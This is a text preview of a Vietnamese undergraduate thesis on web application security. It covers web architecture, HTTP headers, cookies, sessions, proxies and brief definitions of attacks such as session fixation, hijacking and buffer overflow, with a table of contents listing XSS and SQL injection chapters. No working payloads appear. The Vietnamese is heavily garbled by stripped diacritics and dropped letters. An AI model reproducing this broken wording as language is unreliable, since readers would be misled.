Upload
hoclieumo
View
217
Download
0
Embed Size (px)
Citation preview
8/14/2019 LVCNTT-BaoMatWeb
1/169
Khoa CNTT
B GIO DC V O TOTRNG I HC KHOA HC TNHIN TP.HCM
KHOA CNG NGH THNG TIN
B MN MNG MY TNH
LUN VN TT NGHIP
TI:
NGHIN CU MT S VN V BO MTNG DNG WEB TRN INTERNET
GVHD: Th.S. MAI VN CNGSVTH : NGUYN DUY TH NG - 9912074
NGUY N MINH THU - 9912156
KHA HC: 1999-2003
8/14/2019 LVCNTT-BaoMatWeb
2/169
Khoa CNTT
Li cm n
Sau gn 6 thng n lc thc hin, lun vn nghin cu Cc kthut tn cng v
bo mt ng dng Web trn Internet phn no hon thnh. Ngoi s c gng
ht mnh ca bn thn, chng em nhn c s khch l rt nhiu t pha nh
trng, thy c, gia nh v bn b.
Trc ht chng con xin cm n ba m lun ng vin v to mi iu kintt chng con hc tp v hon thnh lun vn tt nghip ny.
Chng em xin cm n thy c trng i Hc Khoa Hc T Nhin truyn t
nhng kin thc qu bu cho chng em trong sut qu trnh hc tp. c bit,
chng em xin by t lng chn thnh su sc n thy Mai Vn Cng, ngi
tn tnh hng dn v gip chng em trong qu trnh lm lun vn tt nghip.
Xin cm n tt c bn b v ang ng vin, gip chng ti trong qu trnh
hc tp v hon thnh tt lun vn tt nghip ny.
8/14/2019 LVCNTT-BaoMatWeb
3/169
Khoa CNTT
Li nhn xt
8/14/2019 LVCNTT-BaoMatWeb
4/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
MC LCGII THIU
T chc ca lun vn...PHN THNHT: C S L THUYT.
Chng 1: Gii thu ng dng Web..
I. KHI NIM NG D NG WEB..
II. M T HOT NG CA MT NG DNG WEB.....
Chng 2: Cc khi nim, thut ng lin quan ..
I. HACKER
II. HTTP HEADER...
III. SESSION.
IV. COOKIE..
V. PROXY.
Chng 3: Gii thiu slc v cc kthut tn cng ng dng Web..
I. KIM SOT TRUY CP WEB
I.1. Thm nhp h thng qua ca sau..
II. CHIM HU PHIN LM VIC...
II.1. n nh phin lm vicII.2. nh cp phin lm vic.
III. LI DNG CC THIU ST TRONG VIC KIM TRA DLIU NHP HP
L........
III.1. Kim tra tnh ng n ca d liu bng ngn ng pha trnh duyt....
III.2. Trn bm...
III.3. M ha URL..
III.4. K t Meta..
III.5. Vt qua ng dn..
III.6. Chn m lnh thc thi trn trnh duyt nn nhn..
III.7. Thm cu lnh h thng....
7
911
12
13
16
18
19
19
21
22
25
26
27
27
27
2727
27
28
28
28
28
29
29
29
8/14/2019 LVCNTT-BaoMatWeb
5/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
III.8. Chn cu truy vn SQL.
III.9. Ngn ng pha my ch................................................................
III.10. K t rng....
III.11. Thao tc trn tham s truyn...
IV. L THNG TIN.
V. TCHI DCH V...
PHN THHAI: CC K THUT TN CNG V BO MT NG DNG WEB..
Chng 4: Thao tc trn tham s truyn
I. THAO TC TRN URL..
I.1. Khi nim.
I.2. Mt s bin php khc phc.II. THAO TC TRN BIN N FORM.
II.1. Khi nim
II.2. Mt s bin php khc phc...
III. THAO TC TRN COOKIE
III.1. Khi nim .
III.2. Mt s bin php khc phc..
IV. THAO TC TRONG HTTP HEADER.
IV.1. Khi nim..
IV.2. Mt s bin php khc phc..
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Side Scripting).
I. K THUT TN CNG CROSS-SITE SCRIPTING (XSS)...
II. PHNG PHP TN CNG XSS TRUYN THNG...
III. MT S WEBSITE TM THY L HNG XSS...
IV. TN CNG XSS B NG FLASH.
V. CCH PHNG CHNGChng 6: Chn cu truy vn SQL (SQL Injection).
I. KHI NIM SQL INJECTION...
II. GII THIU M HNH C S DLIU...
30
30
30
30
31
31
33
34
35
35
3636
36
38
39
39
40
41
41
42
43
44
46
50
51
5456
57
57
8/14/2019 LVCNTT-BaoMatWeb
6/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
III. CC CCH T N CNG.
III.1. Kthut tn cng SQL Injection...
III.2. Tn cng da vo cu lnh SELECT
III.3. Tn cng da vo cu lnh HAVING...
III.4. Tn cng da vo cu lnh kt h p UNION
III.5. Tn cng da vo lnh INSERT...
III.6. Tn cng da vo STORED PROCEDURE
III.7. Nng cao...
III.7.1. Chui k t khng c du nhy n.
III.7.2. Tn cng 2 tng
III.7.3. Trnh s kim sot...III.7.4. Dng Extended Stored Procedure
III.7.4.1. Dng Extended Stored Procedure c sn trong h thng SQL Server...
III.7.4.2. Dng Extended Stored Procedure t to.
III.7.4.3. Nhp tp tin vn bn vo bng
IV. CCH PHNG CHNG
IV.1. Kim tra d liu..
IV.2. Kho cht SQL Server (SQL Server Lockdown)...
Chng 7: Chim hu phin lm vic (Session Management)
I. TNG QUAN V SESSION ID..
II. N NH PHIN LM VIC...
II.1. Tn cng Session ID trn tham s URL
II.2. Tn cng Session ID trong bin n form...
II.3. Tn cng Session ID trong cookie.
II.4. Cch phng chng.
III. NH CP PHIN LM VIC..III.1. Tn cng kiu don phin lm vic (Prediction sessionID)
III.2. Tn cng kiu vt cn phin lm vic (Brute force ID)...
III.3. Tn cng kiu dng on m nh cp phin lm vic...
58
58
60
62
62
69
70
70
70
71
7475
75
76
77
77
78
81
83
84
85
88
89
89
91
9293
93
94
8/14/2019 LVCNTT-BaoMatWeb
7/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
III.4. Cch phng chng.
III.5. S khc bit gia nh cp phin lm vic (session hijacking) v n nh phin
lm vic (session fixation)...
Chng 8: Trn bm (Buffer Overflow)..
I. KHI NIM.
II. S T CHC CA B NH.
II.1. Stack...
II.2. Push v Pop
II.3. Cch lm vic ca hm..
II.4. Shell code...
III. MT S CCH GY TRN BM QUA NG DNG WEB.IV. CC CCH PHNG CHNG.
Chng 9: T chi dch v (DoS).
I. KHI NIM..
II. NHNG KH NNG B TN CNG BNG DOS.
III. CC K THUT T N CNG..
III.1. Khi nim v Tcp bt tay ba chiu
III.2. Li dng TCP thc hin phng php SYN flood truyn thng..
III.3. Tn cng vo bng thng..
III.3.1. Kiu tn cng th 1..
III.3.2. Kiu tn cng th 2..
III.4. Kiu tn cng vo ti nguyn h thng.
IV. BIN PHP PHNG CHNG.
Chng 10: Mt s kthut tn cng khc...
I. M HA URL (URL Encoding)
I.1. Khi nimI.2. Mt s bin php phng chng...
II. KIU TN CNG VT NG DN
II.1. Khi nim..
94
94
97
98
99
100
101
102
104
106106
108
109
109
110
110
112
113
113
113
117
117
119
120
120121
121
121
8/14/2019 LVCNTT-BaoMatWeb
8/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
II.2. Mt s bin php phng chng..
III. TN CNG DA VO K TRNG...
III.1. Khi nim..
III.2. Mt s bin php phng chng.
IV. NGN NGPHA TRNH CH.
IV.1. Khi nim..
IV.2. Cch tn cng
IV.3. Bin php phng chng
Chng 11: Tng kt qu trnh tn cng ca Hacker...
I. THU THP THNG TIN MC H TNG CA MC TIU
II. KHO ST NG D NG WEBIII. TN CNG..
Chng 12: Tng kt cc bin php phng chng...
I. VI NHNG NH QUN TR MNG
II. VI NHNG NH THIT KNG DNG WEB.
III. VI NGI SDNG NG DNG WEB...
PHN THBA: CHNG TRNH WEB CHECKER..
Chng 13: Chng trnh Web Checker..
I. C T CHNG TRNH WEB CHECKER..
I.1. Tng quan...
I.2. Yu cu...
I.2.1. Yu cu chc nng.
I.2.1. Yu cu phi chc nng...
II. KIN TRC CHNG TRNH WEB CHECKER..
II.1. Kin trc chng trnh Web Checker...
II.2. Giao tip gia chng trnh vi trnh ch Web.III. CI T...
III.1. Ngn ng ci t..
III.2. Phng php ci t.
122
123
123
123
123
123
125
125
127
128
131132
134
135
137
139
140
141
142
142
142
142
143
143
143
144145
145
145
8/14/2019 LVCNTT-BaoMatWeb
9/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
III.2.1. S dng m hnh giao din dng Dialog.
III.2.2. S dng ActiveX Control (Microsoft Web Browser).
III.2.3. S dng giao din lp trnh Window Socket 2
III.2.4. Mt s lp v hm chnh c ci t trong chng trnh.
III.3. M t chng trnh v cch s dng
III.3.1. Mn hnh chng trnh
III.3.2. Cch s dng...
IV. NH GI CHNG TRNH
IV.1. Nhng vn t c..
IV.2. Nhng vn hn ch
KT LUN...I. NHNG VN T C.
II. HNG PHT TRIN.
PH LC..
145
145
146
146
151
151
152
153
153
153
155156
157
158
8/14/2019 LVCNTT-BaoMatWeb
10/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
-Trang 7-
GII THIU
Ngy nay, khi Internet c ph bin rng ri, cc t chc, c nhn u c nhu cu
gii thiu thng tin ca mnh trn xa l thng tin cng nh thc hin cc phin giao
dch trc tuyn. Vn ny sinh l khi phm vi ng dng ca cc ng dng Web ngy
cng mrng th kh nng xut hin li v b tn cng cng cao, tr thnh i tng
cho nhiu ngi tn cng vi cc mc ch khc nhau. i khi, cng chn gin l
th ti hoc a bn vi ngi khc.
Cng vi s pht trin khng ngng ca Internet v cc dch v trn Internet, s lng
cc v tn cng trn Internet cng tng theo cp s nhn. Trong khi cc phng tin
thng tin i chng ngy cng nhc nhiu n nhng kh nng truy nhp thng tin ca
Internet, th cc ti liu chuyn mn bt u cp nhiu n vn bo m v an
ton d liu cho cc my tnh c kt ni vo mng Internet.
Theo s liu ca CERT (Computer Emegency Response Team - "i cp cu my
tnh"), s lng cc v tn cng trn Internet c thng bo cho t chc ny l t hn
200 vo nm 1989, khong 400 vo nm 1991, 1400 vo nm 1993, v 2241 vo nm
1994, v nm 2001 l 5315 v.
Nhng v tn cng ny nhm vo tt c cc my tnh c mt trn Internet, cc my tnh
ca tt c cc cng ty ln nh AT&T, IBM, cc trng i hc, cc cquan nh nc,
cc t chc qun s, nh bng... Mt s v tn cng c quy m khng l (c ti
100.000 my tnh b tn cng). Hn na, nhng con s ny ch l phn ni ca tng
bng. Mt phn rt ln cc v tn cng khng c thng bo, v nhiu l do, trong
8/14/2019 LVCNTT-BaoMatWeb
11/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
-Trang 8-
c th kn ni lo b mt uy tn, hoc n gin nhng ngi qun tr h thng khng
hay bit nhng cuc tn cng ang nhm vo h thng ca h.
in hnh l cuc tn cng vo phn mm thng mi ca IBM thng 3/2001, hai
hacker tm thy l hng trn ng dng m bt c ai vi mt trnh duyt Web cng
c th ly ti khon ca ngi dng, thm ch c ngi qun tr.
Khng ch s lng cc cuc tn cng tng ln nhanh chng, m cc phng php tn
cng ngy cng tinh vi v c t chc. Mt khc, vic qun tr cc h thng mng i
hi nh qun tr h thng c kin thc v kinh nghim v h thng mng chc chn,
do s yu km trong qun l s to nhiu iu kin cho cc hacker khai thc.
Cng theo CERT, nhng cuc tn cng thi k 1988-1989 ch yu l on tn ngi
s dng-mt khu (UserID/password) hoc s dng mt s li ca cc chng trnh v
hiu hnh (security hole) lm v hiu h thng bo v, tuy nhin cc cuc tn cng
vo thi gian gn y cn bao gm c cc thao tc nh gi mo a ch IP, theo di
thng tin truyn qua mng, chim cc phin lm vic t xa (telnet hoc rlogin), ci
trojan hay worm kim sot hay iu khin my tnhv th, nhu cu bo v thng
tin trn Internet l cn thit nhm mc ch bo v d liu, bo v thng tin ngi dng
v bo v h thng.
Khi ni n vn bo mt, hu ht cc chuyn gia bo mt u ch trng n s an
ton ca h thng mng v hiu hnh. bo v cho h thng, phng php thng
c chn l s dng firewall. Tuy nhin, theo tuyn b ca CSI/FBI : 78% ni b hi
c s dng firewall v 59% th b tn cng thng qua Internet, c th hn l theo bo
co ca CSI/FBI Computer Crime v Security Survey th tng s thit hi do nhng
ng dng Webb tn cng t nm 1997 n nm 2000 l 626 triu la M.
8/14/2019 LVCNTT-BaoMatWeb
12/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
-Trang 9-
Vi nhng cng c t ng tm l hng tuy gip rt nhiu cho nhng nh l p trnh
Web nhng vn khng th ngn chn ton b v cng ngh Web ang pht trin nhanh
chng (ch yu ch trng n yu t thm m, yu t tc ) nn dn n nhiu
khuyt im mi pht sinh. S tn cng khng nm trong khun kh vi k thut
pht hin, m linh ng v tng ln ty vo nhng sai st ca nh qun tr h thng
cng nh ca nhng ngi lp trnh ng dng.
Lun vn c thc hn vi mc ch tm hiu, phn tch cc l hng bo mt trong
cc ng dng web (cng vi chng trnh minh ha) qua xut cc phng n
sa cha. Song song , lun vn cn thc hin mt chng trnh Tng pht hin
l hng trn ng dng Web gip ch cho nhng nh l p trnh Web t kinh nghim
trnh nhng sai st trong qu trnh to cc ng dng.
Tchc ca lun vn
Lun vn gm 13 chng chia thnh 3 phn:
Phn th nht: CSL THUYT
Phn ny gm c 3 chng:
+ Chng 1 : Gii thiu vng dng Web
+ Chng 2 : Mt s khi nim, thut ng lin quan.
+ Chng 3: Slc cc kthut tn cng ng dng Web
Phn th hai:CC K THUT TN CNG V BIN PHP PHNG CHNG
Phn ny gm c 9 chng t chng 4 n chng 12 trong 7 chng u bn
lun v cc k thut tn cng, cui mi chng l bin php phng chng cho tng k
thut. Chng 11 ni v qu trnh tn cng ca hacker v n chng 12 l ni dung
cc bin php phng chng chung nht.
8/14/2019 LVCNTT-BaoMatWeb
13/169
Khoa CNTT
Nghin cu mt svn vbo mtng dng Web trn Internet
-Trang 10-
Phn thba : CHNG TRNH WEB CHECKER
L gm chng cui trnh by, gii thch v chng trnh
Kt thc lun vn l phn kt lun, tm lc li nhng vn trnh by v mt s
hng pht trin trong tng lai v danh mc cc ti liu tham kho.
8/14/2019 LVCNTT-BaoMatWeb
14/169
Khoa CNTT
Phn I: Csl thuyt
-Trang 11-
PHN THNHT
CSL THUYT
8/14/2019 LVCNTT-BaoMatWeb
15/169
Khoa CNTT
Chng 1: Gii thiu ng dng Web
-Trang 12-
Chng 1
GII THIU NG DNG WEBNi dung:
I. Khi nim v ng dng Web
II. M t cch hot ng ca mt ng dng Web
8/14/2019 LVCNTT-BaoMatWeb
16/169
Khoa CNTT
Chng 1: Gii thiu ng dng Web
-Trang 13-
CHNG 1: GII THIU NG DNG WEB
Lun vn c thc hin nhm tm hiu v cc k thut tn cng trang Web v ra
cch phng chng. Do , trong chng u tin lun vn s gii thiu slc mt s
khi nim cbn v y chnh l nn tng xy dng ni dung cho nhng phn sau.
I. KHI NIM NG DNG WEB
ng dng Web l mt ng dng ch/khch s dng giao thc HTTP tng tc vi
ngi dng hay h thng khc.
Trnh khch dnh cho ngi s dng thng l mt trnh duyt Web nh Internet
Explorer hay Netscape Navigator. Cng c th l mt chng trnh ng vai tr i
l ngi dng hot ng nh mt trnh duyt tng. Ngi dng gi v nhn cc
thng tin t trnh ch thng qua vic tc ng vo cc trang Web. Cc chng trnh
c th l cc trang trao i mua bn, cc din n, gi nhn e-mail
Tc pht trin cc k thut xy dng ng dng Web cng pht trin rt nhanh.
Trc y nhng ng dng Web thng c xy dng bng CGI (Common
Gateway Interface) c chy trn cc trnh ch Web v c th kt ni vo cc cs
d liu n gin trn cng my ch. Ngy nay ng dng Web thng c vit bng
Java (hay cc ngn ng tng t) v chy trn my ch phn tn, kt ni n nhiu
ngun d liu.
Mt ng dng web thng c kin trc gm:
8/14/2019 LVCNTT-BaoMatWeb
17/169
Khoa CNTT
Chng 1: Gii thiu ng dng Web
-Trang 14-
Hnh 1.I-1. Kin trc mt ng dng Web
Lp trnh by: Lp ny c nhim v hin th d liu cho ngi dng, ngoi ra cn
c th c thm cc ng dng to b cc cho trang web.
Lp ng dng: l ni x l ca ng dng Web. N s x l thng tin ngi dng
yu cu, a ra quyt nh, gi kt qu n l p trnh by. L p ny thng
c ci t bng cc k thut l p trnh nh CGI, Java, .NET , PHP hay
ColdFusion, c trin khai trn cc trnh ch nh IBM WebSphere, WebLogic,
Apache, IIS
Lp d liu: thng l cc h qun tr d liu (DBMS) chu trch nhim qun l
cc file d liu v quyn s dng.
M hnh ha hot ng ca mt ng dng Web:
8/14/2019 LVCNTT-BaoMatWeb
18/169
Khoa CNTT
Chng 1: Gii thiu ng dng Web
-Trang 15-
Hnh 1.I-2. M hnh hot ng ca mt ng dng Web
Trong :
Trnh khch ( hay cn gi l trnh duyt): Internet Explorer, Netscap Navigator
Trnh ch: Apache, IIS, .
H qun tr csd liu: SQL Server, MySQL, DB2, Access.
Bn cnh , mt gii php dng bo v mt h thng mng thng c s dng
l bc tng la, n c vai tr nh l lp ro chn bn ngoi mt h thng mng, v
chc nng chnh ca firewall l kim sot lung thng tin gia cc my tnh. C th
xem firewall nh mt b lc thng tin, n xc nh v cho php mt my tnh ny c
c truy xut n mt my tnh khc hay khng, hay mt mng ny c c truy
xut n mng kia hay khng.
Ngi ta thng dng firewall vo mc ch:
Cho php hoc cm nhng dch v truy xut ra ngoi.
8/14/2019 LVCNTT-BaoMatWeb
19/169
Khoa CNTT
Chng 1: Gii thiu ng dng Web
-Trang 16-
Cho php hoc cm nhng dch v t bn ngoi truy nhp vo trong.
Kim sot a ch truy nhp, cm a ch truy nhp.
Firewall hot ng da trn gi IP do kim sot vic truy nhp ca my ngi s
dng
II.M T HOT NG CA MT NG DNG WEB
u tin trnh duyt s gi mt yu cu (request) n trnh ch Web thng qua cc
lnh cbn GET, POST ca giao thc HTTP, trnh ch lc ny c th cho thc thi
mt chng trnh c xy dng t nhiu ngn ng nh Perl, C/C++ hoc trnh
ch yu cu b din dch thc thi cc trang ASP, JSP theo yu cu ca trnh khch.
Ty theo cc tc v ca chng trnh c ci t m n x l, tnh ton, kt ni n
c s d liu, lu cc thng tin do trnh khch gi nv t tr v cho trnh
khch 1 lung d liu c nh dng theo giao thc HTTP, n gm 2 phn:
Header m t cc thng tin v gi d liu v cc thuc tnh, trng thi trao i
gia trnh duyt v WebServer.
Body l phn ni dung d liu m Server gi v Client, n c th l mt file
HTML, mt hnh nh, mt on phim hay mt vn bn bt k.
Theo m hnh hnh 1.I-2, vi firewall, lung thng tin gia trnh ch v trnh khch
l lung thng tin hp l. V th, nu hacker tm thy vi l hng trong ng dng
Web th firewall khng cn hu dng trong vic ngn chn hacker ny. Do , cc kthut tn cng vo mt h thng mng ngy nay ang dn tp trung vo nhng s
sut (hay l hng) trong qu trnh to ng dng ca nhng nh pht trin Web hn l
tn cng trc tip vo h thng mng, hiu hnh. Tuy nhin, hacker cng c th
8/14/2019 LVCNTT-BaoMatWeb
20/169
Khoa CNTT
Chng 1: Gii thiu ng dng Web
-Trang 17-
li dng cc l hng Web mrng s tn cng ca mnh vo cc h thng khng
lin quan khc.
8/14/2019 LVCNTT-BaoMatWeb
21/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 18-
Chng 2
CC KHI NIM, THUT NGLIN QUAN
Ni dung:I. Hacker
II. HTTP Header
III. Phin lm vic (Session)
IV. Cookie
V. Proxy
8/14/2019 LVCNTT-BaoMatWeb
22/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 19-
CHNG 2:
CC KHI NIM, THUT NGLIN QUAN
I. HACKER
Hacker l mt thut ng dng chuyn ch nhng k ph hoi cc h thng mng
Hacker thng l nhng chuyn gia v my tnh. Hacker khng to ra cc k hcho
h thng, nhng hacker li l nhng ngi am hiu v hiu hnh, h qun tr d
liu, cc ngn ng lp trnhH s dng kin thc ca mnh trong vic tm ti vkhai thc cc l hng ca h thng mng. Mt s hacker ch dng li vic pht hin
v thng bo li tm c cho nhng nh bo mt hay ngi pht trin chng trnh,
hc xem nh l WhiteHat (Hacker nn trng). Mt s hacker da vo nhng l
hng thc hin vic khai thc tri php nhm mc ch ph hoi hay mu li ring,
nhng ngi ny b xem nh l BlackHat (Hacker nn en).
V tnh cht ph bin ca thut ng hacker, nn trong phn trnh by, lun vn s sdng hacker thay cho k tn cng.
II.HTTP HEADER
HTTP header l phn u (header) ca thng tin m trnh khch v trnh ch gi cho
nhau. Nhng thng tin trnh khch gi cho trnh chc gi l HTTP requests (yu
cu) cn trnh ch gi cho trnh khch l HTTP responses (tr li). Thng thng,mt HTTP header gm nhiu dng, mi dng cha tn tham s v gi tr. Mt s
8/14/2019 LVCNTT-BaoMatWeb
23/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 20-
tham s c thc dng trong c header yu cu v header tr li, cn s khc th
chuc dng ring trong tng loi. V d :
Header yu cu:
GET /tintuc/homnay.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Connection: Keep-Alive
Host: localhost
Referer: http://localhost/lienket.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Accept-Encoding: gzip, deflate
o Dng u l dng yu cu cho bit phng thc yu cu (GET hoc
POST), a ch yu cu (/tintuc/homnay.asp) v phin bn HTTP
(HTTP/1.1)..
o Tip theo l cc tham s. Chng hn nh: Accept-Language: Cho bit ngn ng dng trong trang web.
Host: Cho bit a ch ca my ch.
Referer: Cho bit a ch ca trang web tham chiu ti.
o Header ca HTTP request s kt thc bng mt dng trng.
Header tr li:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 13 Jul 2000 05:46:53 GMT
8/14/2019 LVCNTT-BaoMatWeb
24/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 21-
Content-Length: 2291
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ;
path=/Cache-control: private
...
o Dng u l dng trng thi, cho bit phin bn HTTP c dng
(HTTP/1.1), m trng thi (200) v trng thi (OK).
o Tip theo l cc tham s.
o Tip theo l mt dng trng bo hiu kt thc header, tip theo l phn
thn ca HTTP response.
Danh sch tham s ca HTTP headerc trnh by trong ph lc A
III. SESSIONHTTP l giao thc hng i tng tng qut, phi trng thi, ngha l HTTP khng
lu tr trng thi lm vic gia trnh duyt vi trnh ch. S thiu st ny gy kh
khn cho mt s ng dng Web, bi v trnh ch khng bit c trc trnh
duyt c nhng trng thi no. V th, gii quyt vn ny, ng dng Web
a ra mt khi nim phin lm vic (Session). Cn SessionID l mt chui chng
thc phin lm vic. Mt s trnh ch s cung cp mt SessionID cho ngi dng
khi h xem trang web trn trnh ch.
duy tr phin lm vic th sessionID thng c lu vo :
8/14/2019 LVCNTT-BaoMatWeb
25/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 22-
Bin trn URL
Bin n form
Cookie
Phin lm vic ch tn ti trong mt khong thi gian cho php, thi gian ny c
cu hnh qui nh ti trnh ch hoc bi ng dng thc thi. Trnh ch s tng gii
phng phin lm vic khi phc li ti nguyn ca h thng.
IV. COOKIE
Cookie l nhng phn d liu nh c cu trc c chia s gia trnh ch v trnh
duyt ca ngi dng.
Cc cookie c lu tr di nhng file d liu nh dng text, c ng dng to ra
lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm trang Web v
nhng vng m hi qua trong trang. Nhng thng tin ny c th bao gm tn/nh
danh ngi dng, mt khu, s thch, thi quen...cookie c trnh duyt ca ngi
dng chp nhn lu trn a cng ca my mnh, tuy nhin khng phi lc no trnhduyt cng h trcookie, m cn ty thuc vo ngi dng c chp nhn chuyn lu
tr hay khng.
nhng ln truy cp sau n trang Web , ng dng c th dng li nhng thng
tin trong cookie (nh thng tin lin quan n vic ng nh p vo Yahoo
Messenger!...) m ngi dng khng phi lm li thao tc ng nhp hay phi cung
cp li cc thng tin khc.
Cookie c phn lm 2 loi secure/non-secure v persistent/non-persistent do ta
s c 4 kiu cookie l:
8/14/2019 LVCNTT-BaoMatWeb
26/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 23-
Persistent v Secure
Persistent v Non-Secure
Non-Persistent v Secure
Non-Persistent v Non-Secure
Persistent cookies c lu tr di dng t p tin .txt (v d trnh duyt Netscape
Navigator s lu cc cookie thnh mt tp tin cookie.txt cn Internet Explorer s lu
thnh nhiu tp tin *.txt trong mi tp tin l mt cookie) trn my khch trong mt
khon thi gian xc nh.
Non-persistent cookie th c lu tr trn b nhRAM ca my khch v s b hy
khi ng trang web hay nhn c lnh hy t trang web.
Secure cookies ch c thc gi thng qua HTTPS (SSL).
Non-Secure cookie c thc gi bng c hai giao thc HTTPS hay HTTP. Thc
cht l i vi secure cookie th trnh ch s cung cp ch truyn bo mt.
Cc thnh phn ca mt cookie gm:
Domain Flag Path Secure Expiration Name Value
www.redhat.
com
FALSE / FALSE 1154029490 Apache 64.3.40.151.16
018996349247
480
Domain: Tn min ca trang web to cookie ( trong v d trn l
www.redhat.com)
8/14/2019 LVCNTT-BaoMatWeb
27/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 24-
Flag: mang gi tr TRUE/FALSE -Xc nh cc my khc vi cng tn min c
c truy xut n cookie hay khng.
Path: Phm vi cc a ch c th truy xut cookie. V d:
Nu path l /tracuu th cc a ch trong th mc /tracuu cng nh tt c cc th
mc con ca n nh /tracuu/baomat c th truy xut n cookie ny. Cn nu gi
tri l / th cookie sc truy xut bi tt ca ch thuc min trang web to
cookie.
Sercure: mang gi tr TRUE/FALSE - Xc nh y l mt secure cookie hay
khng ngha l kt ni c s dng SSL hay khng.
Expiration: thi gian ht hn ca cookie, c tnh bng giy k t 00:00:00 giGMT ngy 01/01/1970. Nu gi tr ny khng c thit l p th trnh duyt s
hiu y l non-persistent cookie v ch lu trong b nhRAM v s xo n khi
trnh duyt bng.
Name: Tn bin (trong trng hp ny l Apache)
Value: Vi cookie c to trn th gi tr ca Apache l
64.3.40.151.16018996349247480 v ngy ht hn l 27/07/2006, ca tn min
http://www.redhat.com.
V d chui lnh trong HTTP header di y s to mt cookie:
Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/";
domain="www.redhat.com"; path_spec; expires="2006-07-27
19:39:15Z"; version=0
Cc cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dn
l: C:\Program Files\Netscape\Users\UserName\Cookies.txt
8/14/2019 LVCNTT-BaoMatWeb
28/169
Khoa CNTT
Chng 2: Cc khi nim, thut nglin quan
-Trang 25-
Cc cookies ca IE c lu thnh nhiu t p tin, mi t p tin l mt cookie v
c t trong [C:]\Documents and Setting\[username]\Cookies (Win2000), i
vi win9x, th mc cookies nm trong th mc [C:]\Windows\cookies.
Kch thc ti a ca cookie l 4kb. S cookie ti a cho mt tn min l 20 cookie.
Cookie b hy ngay khi ng trnh duyt gi l session cookie.
V. PROXY
Proxy cung cp cho ngi s dng truy xut Internet nhng nghi thc t bit hoc
mt t p nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng
chng trnh client ca ngi s dng s qua trung gian proxy server thay th choserver tht s m ngi s dng cn giao tip.
Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng p
ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho client
v tip tc chuyn ti p nhng yu cu t client n server, cng nh tr li ca
servern client. V vy proxy server ging cu ni trung gian gia server v client.
8/14/2019 LVCNTT-BaoMatWeb
29/169
Khoa CNTT
Chng 3: Gii thiu slc vcc kthut tn cng
-Trang 26-
Chng 3
GII THIU SLC V CC K THUT TN
CNG NG DNG WEBNi dung:
I. Kim sot quyn truy cp Web
II. Chim hu phin lm vic
III. Li dng cc thiu st trong vic kim tra d li hp hp l
IV. l thng tin
V. T chi dch v
8/14/2019 LVCNTT-BaoMatWeb
30/169
Khoa CNTT
Chng 3: Gii thiu slc vcc kthut tn cng
-Trang 27-
CHNG 3: GII THIU SLC V CC K
THUT TN CNG NG DNG WEB
Sau y l cc khi nim s lc cc k thut tn cng ng dng Web c phn
loi da trn mc gy tc hi i vi ng dng.
I. KIM SOT TRUY CP WEB (Web Access Control)
I.1. Thm nhp h thng qua ca sau (Back door)
Trong qu trnh thit kng dng, nhng ngi pht trin ng dng c th ci
mt ca sau (back door) sau ny c th thm nhp vo h thng mt cch d
dng.
II.CHIM HU PHIN LM VIC(Session Mangement)
II.1. n nh phin lm vic (Session Fixation)
L kthut tn cng cho php hacker mo danh ngi dng hp l bng cch gi
mt session ID hp l n ngi dng, sau khi ngi dng ng nh p vo h
thng thnh cng, hacker s dng li session ID v nghim nhin tr thnh
ngi dng hp l.
II.2. nh cp phin lm vic (Session Hijacking)
8/14/2019 LVCNTT-BaoMatWeb
31/169
Khoa CNTT
Chng 3: Gii thiu slc vcc kthut tn cng
-Trang 28-
L k thut tn cng cho php hacker mo danh ngi dng hp l sau khi nn
nhn ng nhp vo h thng bng cch gii m session ID ca hc lu
tr trong cookie hay tham s URL, bin n ca form.
III. LI DNG CC THIU ST TRONG VIC KIM TRA
DLIU NHP HP L (Input validation)
Hacker li dng nhng nhp d liu gi i mt on m bt k khin cho h
thng phi thc thi on lnh hay b ph vhon ton.
III.1. Kim tra tnh ng n ca dliu bng ngn ngphatrnh duyt (Client-Side validation)
Do ngn ng pha trnh duyt ( JavaScript, VBScript..) uc thc thi trn trnh
duyt nn hacker c th sa i m ngun c th v hiu ha s kim tra.
III.2. Trn bm (Buffer OverFlow)
Mt khi lng d liu c gi cho ng dng vt qu lng d liu c cp
pht khin cho ng dng khng thc thi c cu lnh dnh k tip m thay
vo phi thc thi mt on m bt k do hacker a vo h thng. Nghim
trng hn nu ng dng c cu hnh thc thi vi quyn root trn h thng.
III.3. M ho URL (URL Encoding)
Li dng chun m ha nhng k t c bit trn URL m hacker s m ho t
ng nhng k tbt hp l- nhng k tb kim tra bng ngn ng kch bn-vt qua vng kim sot ny.
III.4. K t Meta (Meta-characters)
8/14/2019 LVCNTT-BaoMatWeb
32/169
Khoa CNTT
Chng 3: Gii thiu slc vcc kthut tn cng
-Trang 29-
